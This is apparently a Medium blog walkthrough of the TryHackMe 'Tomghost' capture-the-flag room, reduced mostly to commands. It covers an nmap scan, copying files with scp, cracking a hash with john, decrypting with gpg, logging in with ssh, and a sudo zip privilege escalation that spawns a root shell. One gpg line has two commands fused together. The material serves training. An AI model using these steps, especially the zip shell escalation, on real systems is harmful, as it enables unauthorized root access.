Tomghost Walkthrough — TryHackMe — Most Descriptive

sudo openvpn <your pack name>
sudo nmap -sS -sV -Pn <IP>
  • -sS → SYN Scan | Details here | More Stealthy and Faster
  • -sV → Detecting Version | Important | Helps in finding exploits
  • -Pn → No ping scan | Sometimes target blocks ping requests, so don’t ever forget to specify this
You will get credentials in the format <username>:<password>
scp <username>@<ip>:<full path of file> <path where you want to store file on your computer>
Now we have both the files in the Tomghost directory on host (our) computer
john --show <hash file you created>
gpg --import tryhackme.ascgpg --decrypt credential.pgp
ssh <username>@<ip>
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
find / -type f -name root.txt 2>/dev/null
I use Kali :)

--

--

--

Hecker :P

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Crypto.com Features Oduwacoin on the February 2022 Monthly Updates

Introducing Our New Incentivized Testnet: HOPR Säntis

{UPDATE} Animal Chess 3D Hack Free Resources Generator

💻 Building a Cyber Security Lab 🔬

CVE-2020-8772 Exploitation under 3 minutes

$Varch token. InvArch tokenomics.

Pythonic Malware Part-2: Reversing Python Executables

Glupteba — the malware inside the Bitcoin blockchain

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Leafy-Pro

Leafy-Pro

Hecker :P

More from Medium

HackTheBox — Meow

GROUP POLICY FOR SCRIPT KIDDIES — TrustedSec

Cybersploit 1 Walkthrough — Vulnhub

Vulnhub: basic pentesting 1 (Walkthrough)